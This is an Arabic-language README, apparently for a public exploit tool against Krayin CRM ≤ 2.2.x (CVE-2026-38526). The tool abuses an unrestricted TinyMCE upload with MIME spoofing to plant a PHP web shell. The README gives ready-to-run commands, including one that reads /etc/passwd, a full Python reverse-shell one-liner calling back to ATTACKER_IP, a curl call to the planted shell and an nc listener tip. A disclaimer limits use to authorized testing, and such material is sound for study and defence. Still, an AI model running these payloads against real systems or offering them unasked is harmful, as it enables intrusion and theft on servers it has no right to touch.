
استغلال آلي لـ Krayin CRM ≤ 2.2.x.
أداة استغلال آلية لـ Krayin CRM ≤ 2.2.x. يستغل هذا السكربت ثغرة رفع ملفات غير مقيدة في نقطة نهاية TinyMCE (/admin/tinymce/upload)، ويتجاوز التحقق من نوع MIME عبر انتحال image/jpeg، ويرفع قشرة ويب PHP، وينفذ أوامر عشوائية بصلاحيات خادم الويب.
| الخاصية | القيمة |
|---|---|
| CVE ID | CVE-2026-38526 |
| البرنامج المتأثر | Krayin CRM ≤ 2.2.x |
| نوع الثغرة | رفع ملفات غير مقيدة → تنفيذ أوامر عن بُعد |
| المصادقة | مطلوبة (أي حساب مدير صالح) |
| نقطة النهاية | POST /admin/tinymce/upload |
requestsgit clone https://github.com/b0nyo/CVE-2026-38526.git
cd CVE-2026-38526
pip3 install -r requirements.txt
python3 CVE-2026-38526.py -i <TARGET_URL> -u <USERNAME> -p <PASSWORD> [-c <COMMAND>]
# Basic check
python3 CVE-2026-38526.py -i http://target.com -u [email protected] -p "AdminPassword123!"
# Custom command
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "cat /etc/passwd"
# Reverse shell
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'"
/admin/tinymce/upload مع انتحال نوع MIME[*] Target: http://target.com
[*] Username: [email protected]
[*] Authenticating...
[+] Authentication successful
[*] Uploading webshell...
[+] Webshell uploaded: http://target.com/storage/tinymce/abc123def456.php
[+] CVE-2026-38526 CONFIRMED - Remote Code Execution
[*] Executing: id
[*] Output:
────────────────────────────────────────────────────────────────────
uid=33(www-data) gid=33(www-data) groups=33(www-data)
────────────────────────────────────────────────────────────────────
[*] Manual execution (curl):
curl 'http://target.com/storage/tinymce/abc123def456.php?cmd=id'
فشل المصادقة: تحقق من صحة بيانات الاعتماد ومن وجود الحساب على الهدف.
فشل استخراج رمز CSRF: تأكد من أن الهدف يعمل بإصدار Krayin CRM القابل للاستغلال وأن نقطة نهاية تسجيل الدخول يمكن الوصول إليها.
عدم اتصال القشرة العكسية: تأكد من تشغيل المستمع الخاص بك (nc -lvnp <PORT>)، ومن أن قواعد جدار الحماية تسمح بالاتصالات الصادرة، ومن صحة عنوان IP والمنفذ في الحمولة.
تُقدَّم هذه الأداة حصريًا لأغراض اختبار الاختراق المصرح به والأغراض التعليمية فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. يتحمل المستخدمون وحدهم مسؤولية ضمان حصولهم على التفويض المناسب قبل اختبار أي نظام مستهدف. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام أو الأضرار الناجمة عن هذه الأداة.
b0nyo - تنفيذ إثبات المفهوم (PoC)
TREXNEGRO - اكتشاف الثغرة
| العلم | الوصف | مثال |
|---|
-i | عنوان URL الهدف (مع أو بدون http://) | http://target.com أو target.com |
-u | بريد المدير/اسم المستخدم | [email protected] |
-p | كلمة مرور المدير | AdminPassword123! |
-c | الأمر الذي سيتم تنفيذه (الافتراضي: id) | whoami |